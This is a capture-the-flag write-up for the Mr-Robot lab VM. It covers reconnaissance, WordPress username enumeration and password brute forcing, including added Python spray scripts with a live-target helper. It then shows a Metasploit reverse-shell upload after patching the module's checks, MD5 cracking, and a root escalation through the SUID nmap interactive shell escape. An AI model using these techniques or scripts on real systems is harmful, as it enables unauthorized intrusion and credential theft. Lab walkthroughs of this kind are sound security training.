[Write-up]Mr-Robot
About
Information gathering
- The VM runs on a host-only network, so the adapter is vmnet1 and the attacking host always sits at 192.168.7.1/24; sweep that subnet to find the target.
```
:~$ nmap -T4 192.168.7.1/24 -A
Nmap scan report for 192.168.7.129
Host is up (0.00075s latency).
Not shown: 997 filtered ports
PORT    STATE  SERVICE  VERSION
22/tcp  closed ssh
80/tcp  open   http     Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
443/tcp open   ssl/http Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=www.example.com
| Not valid before: 2015-09-16T10:45:03
|_Not valid after:  2025-09-13T10:45:03

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 256 IP addresses (2 hosts up) scanned in 47.44 seconds
:~$ curl http://192.168.7.129/robots.txt
User-agent: *
fsocity.dic
key-1-of-3.txt
```
- robots.txt gives away the first key, key-1-of-3.txt [073403c8a58a1f80d943455fb30724b9], plus a wordlist, fsocity.dic; download the wordlist locally.
- The wordlist is large and full of duplicates, so deduplicate it first (the brute-force later only needs the unique entries):

```
sort fsocity.dic | uniq > list.dic
```
```
:~/Desktop$ nikto -h http://192.168.7.129
- Nikto v2.1.5
---------------------------------------------------------------------------
+ Target IP:          192.168.7.129
+ Target Hostname:    192.168.7.129
+ Target Port:        80
+ Start Time:         2018-06-19 20:37:10 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache
+ IP address found in the 'x-mod-pagespeed' header. The IP is "1.9.32.3".
+ Uncommon header 'x-frame-options' found, with contents: SAMEORIGIN
+ Uncommon header 'x-mod-pagespeed' found, with contents: 1.9.32.3-4523
+ Retrieved x-powered-by header: PHP/5.5.29
+ Uncommon header 'x-pingback' found, with contents: http://192.168.7.129/xmlrpc.php
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server leaks inodes via ETags, header found with file /robots.txt, fields: 0x29 0x52467010ef8ad
+ "robots.txt" retrieved but it does not contain any 'disallow' entries (which is odd).
+ OSVDB-3092: /admin/: This might be interesting...
+ Uncommon header 'tcn' found, with contents: choice
+ OSVDB-3092: /readme: This might be interesting...
+ Uncommon header 'link' found, with contents: <http://192.168.7.129/?p=23>; rel=shortlink
+ OSVDB-3092: /license.txt: License file found may identify site software.
+ /admin/index.html: Admin login page/section found.
+ Cookie wordpress_test_cookie created without the httponly flag
+ /wp-login/: Admin login page/section found.
+ /wordpress/: A Wordpress installation was found.
+ 6544 items checked: 0 error(s) and 16 item(s) reported on remote host
+ End Time:           2018-06-19 20:39:38 (GMT8) (148 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
```
- The quick nikto scan already points at WordPress (x-pingback to xmlrpc.php, the wordpress_test_cookie, /wp-login/); dirsearch confirms the layout. Quote the `*` so the shell does not expand it against files in the current directory:

```
:~/Desktop$ dirsearch -u http://192.168.7.129 -e '*' | grep 200
[20:42:35] 301 -  235B - /admin -> http://192.168.7.129/admin/
[20:42:36] 200 -    1KB - /admin/
[20:42:36] 200 -    1KB - /admin/?/login
[20:42:38] 200 -    1KB - /admin/index
[20:42:38] 200 -    1KB - /admin/index.html
[20:42:41] 301 -    0B  - /admin_area/index.php -> http://192.168.7.129/admin_area/
[20:43:15] 200 -    0B  - /favicon.ico
[20:43:23] 200 -    1KB - /index.html
[20:43:25] 200 -  504KB - /intro
[20:43:28] 200 -  309B  - /license.txt
[20:43:50] 200 -   64B  - /readme
[20:43:50] 200 -   64B  - /readme.html
[20:43:51] 200 -   41B  - /robots.txt
[20:43:56] 200 -    0B  - /sitemap
[20:43:56] 200 -    0B  - /sitemap.xml
[20:43:56] 200 -    0B  - /sitemap.xml.gz
[20:44:12] 200 -    0B  - /wp-content/
[20:44:12] 200 -    0B  - /wp-content/plugins/google-sitemap-generator/sitemap-core.php
[20:44:12] 200 -    3KB - /wp-login
[20:44:12] 200 -    3KB - /wp-login.php
[20:44:12] 200 -    3KB - /wp-login/
```
- It is clearly WordPress, but no post reveals an author name. The login page can be used to enumerate accounts instead: WordPress of this version answers an unknown account with "Invalid username" but a known one with "The password you entered for the username ... is incorrect", so a wrong-password error by itself confirms the account exists. A quick search on Mr. Robot gives the show's protagonist, Elliot, and that name produces the wrong-password message, so the username is right. Now brute-force the password with the deduplicated wordlist from robots.txt:

```
wpscan -u http://192.168.7.129 --username Elliot --wordlist list.dic
```

```
[+] Enumerating plugins from passive detection ...
[+] No plugins found passively
[+] Starting the password brute forcer
[+] [SUCCESS] Login : Elliot Password : ER28-0652
  Brute Forcing 'Elliot' Time: 00:01:21 <=============================================================   > (5637 / 11452) 49.22%  ETA: 00:01:24
  +----+--------+------+-----------+
  | ID | Login  | Name | Password  |
  +----+--------+------+-----------+
  |    | Elliot |      | ER28-0652 |
  +----+--------+------+-----------+

[+] Finished: Tue Jun 19 21:22:23 2018
[+] Elapsed time: 00:01:22
[+] Requests made: 5703
[+] Memory used: 32.516 MB
```
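The two steps above (confirm the username from the error message, then spray the wordlist) written out as a small script. This is an added example, not code from the write-up or from wpscan; the error strings are the ones WordPress 4.x returns on wp-login.php, the `fake_poster` responder is constructed so the demo runs offline, and `make_http_poster` is a plain `requests` helper for a live target (URL and form fields assumed from the standard login form).

```python
"""Added example: WordPress username enumeration + wp-login.php password spray."""
import re
from typing import Callable, Dict, Iterable, List, Optional, Tuple

# Error strings WordPress 4.x puts in #login_error (the era of this VM).
INVALID_USER = re.compile(r"Invalid username", re.I)
WRONG_PASS = re.compile(r"The password you entered for the username .*? is incorrect", re.I)

Response = Tuple[int, str, Dict[str, str]]      # (status, body, headers)
Poster = Callable[[str, str], Response]          # (username, password) -> Response


def dedupe_wordlist(lines: Iterable[str]) -> List[str]:
    """Same effect as `sort fsocity.dic | uniq`: strip, drop blanks, unique, sorted."""
    return sorted({line.strip() for line in lines if line.strip()})


def classify_login(status: int, body: str, headers: Dict[str, str]) -> str:
    """Map one wp-login.php response to success / wrong_password / invalid_username / unknown."""
    if status == 302 and "wp-admin" in headers.get("Location", ""):
        return "success"                       # logged in: redirect into the dashboard
    if WRONG_PASS.search(body):
        return "wrong_password"                # account exists, password wrong
    if INVALID_USER.search(body):
        return "invalid_username"              # account does not exist
    return "unknown"


def enumerate_users(post: Poster, candidates: Iterable[str]) -> List[str]:
    """A username exists when WordPress complains about the password, not the user."""
    found = []
    for user in candidates:
        if classify_login(*post(user, "not-the-real-password")) in ("wrong_password", "success"):
            found.append(user)
    return found


def brute_force(post: Poster, username: str, wordlist: Iterable[str]) -> Optional[str]:
    """Try each candidate until the login redirects to wp-admin; None if none work."""
    for pw in wordlist:
        if classify_login(*post(username, pw)) == "success":
            return pw
    return None


def make_http_poster(base_url: str) -> Poster:
    """Poster for a live target (needs `requests`; not used by the offline demo)."""
    import requests

    def post(user: str, pw: str) -> Response:
        r = requests.post(
            base_url.rstrip("/") + "/wp-login.php",
            data={"log": user, "pwd": pw, "wp-submit": "Log In",
                  "redirect_to": base_url.rstrip("/") + "/wp-admin/", "testcookie": "1"},
            cookies={"wordpress_test_cookie": "WP Cookie check"},
            allow_redirects=False, timeout=10)
        return r.status_code, r.text, dict(r.headers)
    return post


# Constructed stand-in for the target so the demo runs offline; the one account
# and password are the ones the write-up recovered.
_FAKE_USERS = {"Elliot": "ER28-0652"}


def fake_poster(user: str, pw: str) -> Response:
    if user not in _FAKE_USERS:
        return 200, '<div id="login_error"><strong>ERROR</strong>: Invalid username.</div>', {}
    if _FAKE_USERS[user] != pw:
        return 200, ('<div id="login_error"><strong>ERROR</strong>: The password you entered '
                     f'for the username <strong>{user}</strong> is incorrect.</div>'), {}
    return 302, "", {"Location": "http://192.168.7.129/wp-admin/"}


if __name__ == "__main__":
    raw = ["true\n", "false\n", "wikia\n", "ER28-0652\n", "true\n", "\n"]   # constructed wordlist
    words = dedupe_wordlist(raw)
    print("valid users:", enumerate_users(fake_poster, ["admin", "mrrobot", "Elliot"]))
    print("password:", brute_force(fake_poster, "Elliot", words))
```

Against a real target, swap `fake_poster` for `make_http_poster("http://192.168.7.129")`; the classification logic is unchanged, which is the point: the leak is in the error text, not in timing or status codes.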
GetShell
- The first way is the classic one: log in and drop PHP into the theme's 404 template.
- The second way uses Metasploit; pick whichever you prefer. Beware, there is a big pitfall here!
```
msf > use exploit/unix/webapp/wp_admin_shell_upload
msf exploit(unix/webapp/wp_admin_shell_upload) > show options

Module options (exploit/unix/webapp/wp_admin_shell_upload):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   PASSWORD      ER28-0652        yes       The WordPress password to authenticate with
   PAYLOAD_NAME  Kali-Team        yes       Fix By Kali-Team payload_name to update with
   PLUGIN_NAME   WordPress        yes       Fix By Kali-Team plugin_name to update with
   Proxies                        no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST         192.168.7.129    yes       The target address
   RPORT         80               yes       The target port (TCP)
   SSL           false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI     /                yes       The base path to the wordpress application
   USERNAME      Elliot           yes       The WordPress username to authenticate with
   VHOST                          no        HTTP server virtual host

Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.7.1      yes       The listen address (an interface may be specified)
   LPORT  7788             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   WordPress

msf exploit(unix/webapp/wp_admin_shell_upload) > set password ER28-0652
password => ER28-0652
msf exploit(unix/webapp/wp_admin_shell_upload) > set username Elliot
username => Elliot
msf exploit(unix/webapp/wp_admin_shell_upload) > set rhost 192.168.7.129
rhost => 192.168.7.129
msf exploit(unix/webapp/wp_admin_shell_upload) > run

[*] Started reverse TCP handler on 192.168.7.1:4444
[-] Exploit aborted due to failure: not-found: The target does not appear to be using WordPress
[*] Exploit completed, but no session was created.
```
It errors out. A search turns up the fix: the module's WordPress fingerprint fails on this box because the page at TARGETURI `/` is a static intro page rather than the WordPress front page, so the module aborts before it ever uploads the plugin and no callback arrives. Edit the module:

```
/opt/metasploit-framework/embedded/framework/modules/exploits/unix/webapp/wp_admin_shell_upload.rb
```

and comment out the following two lines with `#`:

```ruby
fail_with(Failure::NotFound, 'The target does not appear to be using WordPress') unless wordpress_and_online?
fail_with(Failure::UnexpectedReply, 'Failed to upload the payload') unless uploaded
```

Only the first check blocks this target. The second one is what reports a failed upload; with it gone the module silently goes on to request a plugin file that may not exist, so leave it in place unless the run still stops there. Then reload the module:
```
msf exploit(unix/webapp/wp_admin_shell_upload) > reload
[*] Reloading module...
msf exploit(unix/webapp/wp_admin_shell_upload) > run

[*] Started reverse TCP handler on 192.168.7.1:7788
[*] Authenticating with WordPress using Elliot:ER28-0652...
[+] Authenticated with WordPress
[*] Preparing payload...
[*] Uploading payload...
[*] Executing the payload at /wp-content/plugins/WordPress/Kali-Team.php...
[*] Sending stage (37775 bytes) to 192.168.7.129
[*] Meterpreter session 5 opened (192.168.7.1:7788 -> 192.168.7.129:36273) at 2018-06-19 23:13:10 +0800
ls
[!] This exploit may require manual cleanup of 'Kali-Team.php' on the target
[!] This exploit may require manual cleanup of 'WordPress.php' on the target
[!] This exploit may require manual cleanup of '../WordPress' on the target
```
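Before patching a module blind it is worth reproducing its pre-flight check yourself, so you know which path actually looks like WordPress and whether TARGETURI is simply wrong. The script below is an added example, not code from the write-up or from Metasploit: it fingerprints a few paths for the usual WordPress markers (wp-content and wp-includes references, the generator meta tag, the login form). The marker set and the `fake_fetch` responses are assumptions constructed to mimic this box, where `/` is a static page and the real WordPress login lives at `/wp-login.php`; `http_fetch` is a plain `requests` helper for a live target.

```python
"""Added example: reproduce a WordPress pre-flight fingerprint to see why a module aborts."""
import re
from typing import Callable, Dict, List, Tuple

Fetcher = Callable[[str], Tuple[int, str]]   # path -> (status, body)

# Markers commonly used to recognise WordPress from a page body (assumed set).
MARKERS = {
    "wp-content": re.compile(r"/wp-content/", re.I),
    "wp-includes": re.compile(r"/wp-includes/", re.I),
    "generator-meta": re.compile(r'<meta name="generator" content="WordPress', re.I),
    "wp-login-form": re.compile(r'<form[^>]+id="loginform"', re.I),
}


def wp_markers(body: str) -> List[str]:
    """Names of the markers present in one response body."""
    return [name for name, rx in MARKERS.items() if rx.search(body)]


def fingerprint(fetch: Fetcher, base: str = "/") -> Dict[str, List[str]]:
    """Check the base path the way a module would, then the paths a human would try next."""
    base = base if base.endswith("/") else base + "/"
    results: Dict[str, List[str]] = {}
    for path in (base, base + "wp-login.php", base + "xmlrpc.php"):
        status, body = fetch(path)
        if status == 200:                       # only 200 bodies count as evidence
            results[path] = wp_markers(body)
    return results


def looks_like_wordpress(results: Dict[str, List[str]], path: str) -> bool:
    """True when that path returned 200 and at least one marker."""
    return bool(results.get(path))


# Constructed responses resembling the target: "/" is a static intro page with no
# WordPress markers; "/wp-login.php" is a genuine login page; xmlrpc rejects GET.
_FAKE_SITE = {
    "/": (200, "<html><head><title></title></head><body><canvas id='intro'></canvas></body></html>"),
    "/wp-login.php": (200, '<html><head><link rel="stylesheet" href="/wp-includes/css/buttons.min.css">'
                           '</head><body><form name="loginform" id="loginform" '
                           'action="/wp-login.php" method="post"></form></body></html>'),
    "/xmlrpc.php": (405, "XML-RPC server accepts POST requests only."),
}


def fake_fetch(path: str) -> Tuple[int, str]:
    return _FAKE_SITE.get(path, (404, ""))


def http_fetch(base_url: str) -> Fetcher:
    """Fetcher for a live target (needs `requests`; not used by the offline demo)."""
    import requests

    def fetch(path: str) -> Tuple[int, str]:
        r = requests.get(base_url.rstrip("/") + path, timeout=10, allow_redirects=False)
        return r.status_code, r.text
    return fetch


if __name__ == "__main__":
    res = fingerprint(fake_fetch)
    print("/ looks like WordPress:", looks_like_wordpress(res, "/"))     # False: why the module aborted
    print("/wp-login.php markers:", res.get("/wp-login.php"))
```

When `/` shows no markers but `/wp-login.php` does, the install is at the root and only the front page is non-standard; that is the case where bypassing the detection check (and nothing else) is the right edit.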
Privilege escalation
- The second key sits in the robot user's home directory, but the web-server account has no permission to read it; the same directory also holds an MD5 of robot's password.
```
meterpreter > ls
Listing: /home/robot
====================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100400/r--------  33    fil   2015-11-13 15:28:21 +0800  key-2-of-3.txt
100644/rw-r--r--  39    fil   2015-11-13 15:28:21 +0800  password.raw-md5

meterpreter > cat password.raw-md5
robot:c3fcd3d76192e4007dfb496cca67e13b
```
- Crack the unsalted MD5 (a wordlist or any online lookup does it) and the result should be robot's password.
- su refuses to run from the reverse shell, because it has no controlling terminal:

```
su: must be run from a terminal
```

- Spawn a pty with python to get an interactive shell first:

```
python -c 'import pty;pty.spawn("/bin/bash")'
```
```
python -c 'import pty;pty.spawn("/bin/bash")'
:/home/robot$ su robot
su robot
Password: abcdefghijklmnopqrstuvwxyz
:~$ id
id
uid=1002(robot) gid=1002(robot) groups=1002(robot)
:~$ cat key-2-of-3.txt
cat key-2-of-3.txt
822c73956184f694993bede3eb39f959
```
- Second key found!
- Finally, escalate to root. /root is off limits, so look for SUID binaries and compare the list against what a stock system ships with:
```
:/$ cd /root
cd /root
bash: cd: /root: Permission denied
:/$ find / -perm -4000 -type f 2>/dev/null
find / -perm -4000 -type f 2>/dev/null
/bin/ping
/bin/umount
/bin/mount
/bin/ping6
/bin/su
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/local/bin/nmap
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
/usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
/usr/lib/pt_chown
:/$
```
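The two offline parts of this stage, cracking the `user:md5` file and triaging the SUID list, as one added example (not the write-up's own code). It parses the password.raw-md5 layout, hashes wordlist candidates against it, walks the filesystem for SUID regular files the way the `find` above does, and flags anything outside a baseline of binaries that are SUID on a stock install. The baseline, the demo wordlist and `PAGE_SUID` are constructed here: the baseline is the write-up's own list minus the entries that are not part of a base system, so the entries worth a second look (the vmware-tools wrappers and the hand-installed /usr/local/bin/nmap) fall out of it.

```python
"""Added example: crack password.raw-md5 offline and triage the SUID list."""
import hashlib
import os
import stat
from typing import Dict, Iterable, List, Optional


def parse_raw_md5(text: str) -> Dict[str, str]:
    """Parse `user:hexdigest` lines (the password.raw-md5 layout) into {user: digest}."""
    creds: Dict[str, str] = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or ":" not in line:
            continue
        user, digest = line.split(":", 1)
        creds[user] = digest.strip().lower()
    return creds


def crack_md5(digest: str, candidates: Iterable[str]) -> Optional[str]:
    """Unsalted MD5: hash every candidate and compare; first match wins, None if nothing matches."""
    digest = digest.lower()
    for cand in candidates:
        if hashlib.md5(cand.encode()).hexdigest() == digest:
            return cand
    return None


def find_suid(root: str = "/") -> List[str]:
    """Python equivalent of `find / -perm -4000 -type f 2>/dev/null`."""
    hits: List[str] = []
    for dirpath, _dirnames, filenames in os.walk(root, onerror=lambda _e: None):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)          # lstat: do not follow symlinks
            except OSError:
                continue                     # unreadable entry, same as 2>/dev/null
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                hits.append(path)
    return sorted(hits)


# Constructed baseline: SUID binaries that belong to a base Ubuntu-era install.
BASELINE_SUID = {
    "/bin/ping", "/bin/ping6", "/bin/mount", "/bin/umount", "/bin/su",
    "/usr/bin/passwd", "/usr/bin/newgrp", "/usr/bin/chsh", "/usr/bin/chfn",
    "/usr/bin/gpasswd", "/usr/bin/sudo", "/usr/lib/openssh/ssh-keysign",
    "/usr/lib/eject/dmcrypt-get-device", "/usr/lib/pt_chown",
}


def unusual_suid(paths: Iterable[str], baseline=BASELINE_SUID) -> List[str]:
    """SUID files that are not in the baseline: these get looked at first."""
    return sorted(p for p in paths if p not in baseline)


# The list the write-up's find command printed, constructed here as demo input.
PAGE_SUID = [
    "/bin/ping", "/bin/umount", "/bin/mount", "/bin/ping6", "/bin/su",
    "/usr/bin/passwd", "/usr/bin/newgrp", "/usr/bin/chsh", "/usr/bin/chfn",
    "/usr/bin/gpasswd", "/usr/bin/sudo", "/usr/local/bin/nmap",
    "/usr/lib/openssh/ssh-keysign", "/usr/lib/eject/dmcrypt-get-device",
    "/usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper",
    "/usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper", "/usr/lib/pt_chown",
]


if __name__ == "__main__":
    creds = parse_raw_md5("robot:c3fcd3d76192e4007dfb496cca67e13b\n")
    wordlist = ["password", "robot", "abcdefghijklmnopqrstuvwxyz"]   # constructed wordlist
    for user, digest in creds.items():
        print(user, "->", crack_md5(digest, wordlist))
    print("worth a look (from the write-up's list):", unusual_suid(PAGE_SUID))
    print("worth a look (this machine, /usr):", unusual_suid(find_suid("/usr")))
```

On the real box you would feed `find_suid("/")` to `unusual_suid`; the point of the baseline is that `/usr/local/bin/nmap` stands out immediately, which is exactly where the next step goes.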
- This old nmap (3.81) still has an `--interactive` mode with a `!` shell escape, and the find output shows the binary is SUID root, so a command typed after `!` runs with an effective uid of 0. That is enough to read /root; note that uid stays 1002, so only the effective uid is root.
```
:/$ nmap --help
nmap --help
Nmap 3.81 Usage: nmap [Scan Type(s)] [Options] <host or net list>
Some Common Scan Types ('*' options require root privileges)
* -sS TCP SYN stealth port scan (default if privileged (root))
  -sT TCP connect() port scan (default for unprivileged users)
* -sU UDP port scan
  -sP ping scan (Find any reachable machines)
* -sF,-sX,-sN Stealth FIN, Xmas, or Null scan (experts only)
  -sV Version scan probes open ports determining service & app names/versions
  -sR RPC scan (use with other scan types)
Some Common Options (none are required, most can be combined):
* -O Use TCP/IP fingerprinting to guess remote operating system
  -p <range> ports to scan.  Example range: 1-1024,1080,6666,31337
  -F Only scans ports listed in nmap-services
  -v Verbose. Its use is recommended.  Use twice for greater effect.
  -P0 Don't ping hosts (needed to scan www.microsoft.com and others)
* -Ddecoy_host1,decoy2[,...] Hide scan using many decoys
  -6 scans via IPv6 rather than IPv4
  -T <Paranoid|Sneaky|Polite|Normal|Aggressive|Insane> General timing policy
  -n/-R Never do DNS resolution/Always resolve [default: sometimes resolve]
  -oN/-oX/-oG <logfile> Output normal/XML/grepable scan logs to <logfile>
  -iL <inputfile> Get targets from file; Use '-' for stdin
* -S <your_IP>/-e <devicename> Specify source address or network interface
  --interactive Go into interactive mode (then press h for help)
Example: nmap -v -sS -O www.my.com 192.168.0.0/16 '192.88-90.*.*'
SEE THE MAN PAGE FOR MANY MORE OPTIONS, DESCRIPTIONS, AND EXAMPLES
:/$
:/$ nmap --interactive
nmap --interactive

Starting nmap V. 3.81 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !id
!id
uid=1002(robot) gid=1002(robot) euid=0(root) groups=0(root),1002(robot)
waiting to reap child : No child processes
nmap> ls
Unknown command (ls) -- press h <enter> for help
nmap> !ls
!ls
bin   dev  home        lib    lost+found  mnt  proc  run   srv  tmp  var
boot  etc  initrd.img  lib64  media       opt  root  sbin  sys  usr  vmlinuz
waiting to reap child : No child processes
nmap> !ls /root
!ls /root
firstboot_done  key-3-of-3.txt
waiting to reap child : No child processes
nmap> cat /root/key-3-of-3.txt
cat /root/key-3-of-3.txt
Unknown command (cat) -- press h <enter> for help
nmap> !cat /root/key-3-of-3.txt
!cat /root/key-3-of-3.txt
04787ddef27c3dee1ee161b21670b4e4
waiting to reap child : No child processes
nmap>
```
Easter egg
- The credentials were handed to you all along. The license file

```
http://192.168.7.129/license.txt
```

contains the string

```
ZWxsaW90OkVSMjgtMDY1Mgo=
```

- Base64-decode it:

```
echo ZWxsaW90OkVSMjgtMDY1Mgo= | base64 --decode
```

- elliot:ER28-0652 (WordPress matches the login name case-insensitively, so this is the same Elliot account that was brute-forced above).